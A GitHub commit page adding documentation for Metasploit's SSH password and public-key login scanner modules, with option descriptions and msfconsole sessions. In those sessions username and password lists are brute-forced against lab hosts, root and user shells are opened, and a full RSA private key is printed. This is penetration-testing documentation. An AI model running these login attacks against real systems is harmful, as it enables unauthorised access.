Skip to content

Commit aee6707

Browse files
committed
ssh_login docs
1 parent face944 commit aee6707

File tree

2 files changed

+328
-0
lines changed

2 files changed

+328
-0
lines changed
Lines changed: 193 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,193 @@
1+
## SSH Service
2+
3+
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
4+
This module attempts to login to SSH with username and password combinations. For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
5+
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
6+
7+
## Verification Steps
8+
9+
1. Install SSH and start it.
10+
2. Start msfconsole
11+
3. Do: ` use auxiliary/scanner/ssh/ssh_login`
12+
4. Do: `set rhosts`
13+
5. Do: set usernames and passwords via any of the available options
14+
5. Do: `run`
15+
6. You will hopefully see something similar to: `[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '`, and a shell opened.
16+
17+
## Options
18+
19+
**BLANK_PASSWORD**
20+
21+
Boolean value on if an additional login attempt should be attempted with an empty password for every user.
22+
23+
**PASSWORD**
24+
25+
Password to try for each user.
26+
27+
**PASS_FILE**
28+
29+
A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
30+
31+
**RHOSTS**
32+
33+
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
34+
35+
**STOP_ON_SUCCESS**
36+
37+
If a valid login is found on a host, immediately stop attempting additional logins on that host.
38+
39+
**USERNAME**
40+
41+
Username to try for each password.
42+
43+
**USERPASS_FILE**
44+
45+
A file containing a username and password, separated by a space, on every line. An example line would be `username password`
46+
47+
**USER_AS_PASS**
48+
49+
Boolean value on if an additional login attempt should be attempted with the password as the username.
50+
51+
**USER_FILE**
52+
53+
A file containing a username on every line.
54+
55+
**VERBOSE**
56+
57+
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed: 'msfadmin:virtual'`
58+
59+
## Option Combinations
60+
61+
It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
62+
This module makes a combination of all of the above when attempting logins. So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
63+
64+
## Scenarios
65+
66+
Example run against:
67+
* Ubuntu 14.04 Server with root login permitted: 192.168.2.156
68+
* Ubuntu 16.04 Server: 192.168.2.137
69+
* Metasploitable: 192.168.2.46
70+
* Metasploitable 2: 192.168.2.35
71+
72+
```
73+
msf > use auxiliary/scanner/ssh/ssh_login
74+
msf auxiliary(ssh_login) > cat /root/ssh_passwords.lst
75+
[*] exec: cat /root/ssh_passwords.lst
76+
77+
msfadmin
78+
badpassword
79+
root
80+
ubuntu
81+
82+
msf auxiliary(ssh_login) > set pass_file /root/ssh_passwords.lst
83+
pass_file => /root/ssh_passwords.lst
84+
msf auxiliary(ssh_login) > cat /root/ssh_un.lst
85+
[*] exec: cat /root/ssh_un.lst
86+
87+
msfadmin
88+
badpassword
89+
root
90+
ubuntu
91+
92+
msf auxiliary(ssh_login) > set user_file /root/ssh_un.lst
93+
user_file => /root/ssh_un.lst
94+
msf auxiliary(ssh_login) > cat /root/ssh_hosts.lst
95+
[*] exec: cat /root/ssh_hosts.lst
96+
97+
192.168.2.156
98+
192.168.2.137
99+
192.168.2.35
100+
192.168.2.46
101+
msf auxiliary(ssh_login) > set rhosts file://root/ssh_hosts.lst
102+
rhosts => file://root/ssh_hosts.lst
103+
msf auxiliary(ssh_login) > set verbose false
104+
verbose => false
105+
msf auxiliary(ssh_login) > set threads 4
106+
threads => 4
107+
msf auxiliary(ssh_login) > exploit
108+
109+
[*] SSH - Starting bruteforce
110+
[*] SSH - Starting bruteforce
111+
[*] SSH - Starting bruteforce
112+
[*] SSH - Starting bruteforce
113+
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
114+
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
115+
[*] Command shell session 5 opened (192.168.2.117:44415 -> 192.168.2.46:22) at 2017-02-22 20:26:13 -0500
116+
[*] Command shell session 6 opened (192.168.2.117:36107 -> 192.168.2.35:22) at 2017-02-22 20:26:13 -0500
117+
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
118+
[*] Command shell session 7 opened (192.168.2.117:32829 -> 192.168.2.156:22) at 2017-02-22 20:26:35 -0500
119+
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
120+
[*] Command shell session 8 opened (192.168.2.117:42205 -> 192.168.2.156:22) at 2017-02-22 20:26:42 -0500
121+
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
122+
[*] Command shell session 9 opened (192.168.2.117:37027 -> 192.168.2.137:22) at 2017-02-22 20:26:44 -0500
123+
[*] Scanned 3 of 4 hosts (75% complete)
124+
[*] Scanned 4 of 4 hosts (100% complete)
125+
[*] Auxiliary module execution completed
126+
msf auxiliary(ssh_login) > sessions -l
127+
128+
Active sessions
129+
===============
130+
131+
Id Type Information Connection
132+
-- ---- ----------- ----------
133+
5 shell /linux SSH msfadmin:msfadmin (192.168.2.46:22) 192.168.2.117:44415 -> 192.168.2.46:22 (192.168.2.46)
134+
6 shell /linux SSH msfadmin:msfadmin (192.168.2.35:22) 192.168.2.117:36107 -> 192.168.2.35:22 (192.168.2.35)
135+
7 shell /linux SSH root:ubuntu (192.168.2.156:22) 192.168.2.117:32829 -> 192.168.2.156:22 (192.168.2.156)
136+
8 shell /linux SSH ubuntu:ubuntu (192.168.2.156:22) 192.168.2.117:42205 -> 192.168.2.156:22 (192.168.2.156)
137+
9 shell /linux SSH ubuntu:ubuntu (192.168.2.137:22) 192.168.2.117:37027 -> 192.168.2.137:22 (192.168.2.137)
138+
```
139+
140+
Example run against:
141+
* Windows 10 w/ Linux Subsystem
142+
143+
```
144+
msf > use auxiliary/scanner/ssh/ssh_login
145+
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
146+
rhosts => 192.168.2.140
147+
msf auxiliary(ssh_login) > set username winuser
148+
username => winuser
149+
msf auxiliary(ssh_login) > set password "badpassword"
150+
password => badpassword
151+
msf auxiliary(ssh_login) > exploit
152+
153+
[*] SSH - Starting bruteforce
154+
[+] SSH - Success: 'winuser:badpassword' ''
155+
[!] No active DB -- Credential data will not be saved!
156+
[*] Command shell session 1 opened (192.168.2.117:42227 -> 192.168.2.140:22) at 2017-02-22 20:40:12 -0500
157+
[*] Scanned 1 of 1 hosts (100% complete)
158+
[*] Auxiliary module execution completed
159+
msf auxiliary(ssh_login) > sessions -l
160+
161+
Active sessions
162+
===============
163+
164+
Id Type Information Connection
165+
-- ---- ----------- ----------
166+
1 shell / SSH winuser:badpassword (192.168.2.140:22) 192.168.2.117:42227 -> 192.168.2.140:22 (192.168.2.140)
167+
168+
```
169+
170+
Example run against:
171+
* Windows 10 w/ Bitvise SSH Server (WinSSHD) version 7.26-r2 and a virtual account created
172+
173+
It is important to note here that the module gives back a **Success**, but then errors when trying to identify the remote system.
174+
This should be enough info to manually exploit via a regular SSH command.
175+
176+
```
177+
msf > use auxiliary/scanner/ssh/ssh_login
178+
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
179+
rhosts => 192.168.2.140
180+
msf auxiliary(ssh_login) > set username virtual
181+
username => virtual
182+
msf auxiliary(ssh_login) > set password virtual
183+
password => virtual
184+
msf auxiliary(ssh_login) > exploit
185+
186+
[*] SSH - Starting bruteforce
187+
[+] SSH - Success: 'virtual:virtual' 'id: Command not found. help ?: Command not found. '
188+
[!] No active DB -- Credential data will not be saved!
189+
[*] 192.168.2.140 - Command shell session 4 closed. Reason: Died from EOFError
190+
[*] Command shell session 4 opened (192.168.2.117:36169 -> 192.168.2.140:22) at 2017-02-22 21:20:24 -0500
191+
[*] Scanned 1 of 1 hosts (100% complete)
192+
[*] Auxiliary module execution completed
193+
```
Lines changed: 135 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,135 @@
1+
## SSH Service
2+
3+
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
4+
This module attempts to login to SSH with username and private key combinations. For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
5+
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
6+
7+
### Key Generation
8+
9+
On most modern *nix Operating System, the `ssh-keygen` command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no password should be set during `ssh-keygen`.
10+
After following the prompts to create the SSH key pair, the `pub` key needs to be added to the authorized_keys list. To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
11+
12+
## Verification Steps
13+
14+
1. Install SSH and start it.
15+
2. Create an SSH keypair and add the public key to the `authorized_keys` file
16+
3. Start msfconsole
17+
4. Do: ` use auxiliary/scanner/ssh/ssh_login_pubkey`
18+
5. Do: `set rhosts`
19+
6. Do: set usernames with one of the available options
20+
7. Do: `set KEY_PATH ` to either a file or path
21+
7. Do: `run`
22+
8. You will hopefully see something similar to: `[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----`, and a shell opened.
23+
24+
## Options
25+
26+
**KEY_PATH**
27+
28+
A string to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
29+
An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`. The file contents, when not encrypted with a password will start with `-----BEGIN RSA PRIVATE KEY-----`
30+
31+
**RHOSTS**
32+
33+
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
34+
35+
**STOP_ON_SUCCESS**
36+
37+
If a valid login is found on a host, immediately stop attempting additional logins on that host.
38+
39+
**USERNAME**
40+
41+
Username to try for each password.
42+
43+
**USER_FILE**
44+
45+
A file containing a username on every line.
46+
47+
**VERBOSE**
48+
49+
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed`
50+
51+
## Option Combinations
52+
53+
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
54+
This module makes a combination of all of the above when attempting logins. So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
55+
56+
## Scenarios
57+
58+
Example run with a FOLDER set for `KEY_PATH` against:
59+
* Ubuntu 14.04 Server
60+
61+
```
62+
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
63+
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
64+
rhosts => 192.168.2.156
65+
msf auxiliary(ssh_login_pubkey) > set username ubuntu
66+
username => ubuntu
67+
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
68+
key_path => /root/sshkeys/
69+
msf auxiliary(ssh_login_pubkey) > run
70+
71+
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
72+
[*] SSH - Testing 2 keys from /root/sshkeys
73+
[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
74+
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
75+
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
76+
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
77+
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
78+
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
79+
aAz8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
80+
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
81+
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
82+
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
83+
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
84+
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
85+
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
86+
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
87+
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
88+
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
89+
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
90+
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
91+
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
92+
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
93+
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
94+
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
95+
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
96+
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
97+
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
98+
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
99+
-----END RSA PRIVATE KEY-----
100+
101+
'
102+
[!] No active DB -- Credential data will not be saved!
103+
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
104+
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
105+
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
106+
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
107+
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
108+
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
109+
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
110+
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
111+
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
112+
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
113+
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
114+
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
115+
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
116+
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
117+
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
118+
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
119+
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
120+
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
121+
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
122+
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
123+
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
124+
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
125+
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
126+
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
127+
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
128+
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
129+
-----END RSA PRIVATE KEY-----
130+
131+
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
132+
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
133+
[*] Scanned 1 of 1 hosts (100% complete)
134+
[*] Auxiliary module execution completed
135+
```

0 commit comments

Comments
 (0)